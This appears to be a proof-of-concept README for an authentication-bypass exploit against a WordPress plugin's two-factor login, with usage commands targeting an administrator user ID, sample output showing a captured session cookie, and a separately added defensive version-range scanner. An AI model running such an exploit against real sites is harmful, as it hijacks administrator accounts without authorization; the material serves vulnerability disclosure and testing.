An error-handling flaw in the REST API of the Really Simple Plugins WordPress plugin (versions 9.0.0 through 9.1.1.1 inclusive) allows an attacker, when Two-Factor Authentication is enabled, to bypass authentication and take control of an existing user or administrator account.
As I'm a nice guy, you'll also find version 9.1.1.1 of the plugin. Just unzip and upload it into the wp-content/plugins folder. Don't forget to activate the plugin and enable 2FA.
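As an added defensive check that is not part of this PoC or of the plugin itself: the script below reads the `Version:` field from a WordPress plugin's header comment and reports whether it falls in the affected range 9.0.0 to 9.1.1.1 described above, comparing components numerically so that 9.1.1.1 sorts above 9.1.1 and 9.10.0 above 9.2.0. The sample header is a constructed placeholder, and `scan_plugins` assumes the standard wp-content/plugins layout (one directory per plugin, header in a top-level .php file).

```python
"""Added example, not part of the original PoC: report whether a WordPress
plugin's header version falls in the affected range 9.0.0 to 9.1.1.1."""
import re
from pathlib import Path
from typing import Dict, Optional, Tuple

AFFECTED_MIN = (9, 0, 0)
AFFECTED_MAX = (9, 1, 1, 1)

# Constructed sample of a plugin file header (placeholder, not the real plugin).
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Example Plugin (constructed sample)
 * Version: 9.1.1.1
 */
"""

def parse_version(text: str) -> Tuple[int, ...]:
    """'9.1.1.1' -> (9, 1, 1, 1); stops at the first non-numeric component."""
    parts = []
    for piece in text.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)

def is_affected(version: str) -> bool:
    """Numeric range check, zero-padded so 9.1.1 < 9.1.1.1 and 9.10.0 > 9.2.0."""
    parsed = parse_version(version)
    if not parsed:
        return False
    width = max(len(parsed), len(AFFECTED_MIN), len(AFFECTED_MAX))
    pad = lambda t: t + (0,) * (width - len(t))
    return pad(AFFECTED_MIN) <= pad(parsed) <= pad(AFFECTED_MAX)

def header_version(php_source: str) -> Optional[str]:
    """Extract the 'Version:' field from the plugin header comment block."""
    match = re.search(r"^\s*\*?\s*Version:\s*(.+?)\s*$", php_source, re.M | re.I)
    return match.group(1) if match else None

def scan_plugins(plugins_dir: Path) -> Dict[str, Optional[str]]:
    """Slug -> header version (None if no top-level *.php declares one)."""
    results = {}
    for plugin in sorted(p for p in plugins_dir.iterdir() if p.is_dir()):
        versions = (header_version(f.read_text(errors="ignore")) for f in plugin.glob("*.php"))
        results[plugin.name] = next((v for v in versions if v), None)
    return results
```

Run `scan_plugins(Path("/path/to/wp-content/plugins"))` on a site and pass each returned version through `is_affected` to list installs still in the affected range.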
Install the required dependencies using pip:

```
pip install -r requirements.txt
```

- argparse: For parsing command-line arguments.
- validator-collection: To validate the URL format.
- requests: To send HTTP POST requests.
- random: To generate a random nonce for the payload.
```
python exploit.py [-id USER_ID] URL
```

- With a specific user ID:

  ```
  python exploit.py -id 10 http://localhost:8886/
  ```

  This sends the exploit payload with a user ID of 10.

- Without specifying a user ID:

  ```
  python exploit.py http://localhost
  ```

  The user ID defaults to 1.
Example output on success:

```
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
```

Example output on failure:

```
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
```
- Use responsibly: This script is for educational and penetration testing purposes only.
- Authorization: Ensure you have explicit permission to test the target system.
- HTTPS: Disable SSL verification (`verify=False`) only if necessary for testing.
IDK but I'm not responsible for anything.